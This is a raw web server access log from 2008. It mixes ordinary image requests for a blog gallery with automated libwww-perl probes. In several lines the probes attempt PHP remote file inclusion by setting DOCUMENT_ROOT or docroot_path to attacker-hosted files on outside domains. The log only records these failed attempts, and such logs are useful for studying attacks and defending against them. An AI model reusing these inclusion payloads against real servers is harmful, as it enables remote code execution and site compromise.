72.199.235.196 - - [20/Sep/2008:09:12:12 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-067_0.jpg HTTP/1.1" 200 466805 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
87.28.81.20 - - [20/Sep/2008:09:12:12 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://piti.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:12:12 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0120.jpg HTTP/1.1" 200 371886 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
87.28.81.20 - - [20/Sep/2008:09:12:12 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://piti.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:12:15 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:12:16 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:12:16 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.104.33.42 - - [20/Sep/2008:09:12:18 -0700] "GET /logs/access_080904.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://irc3.ircwar.info/reav/idar.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:12:19 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0147.jpg HTTP/1.1" 200 421697 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
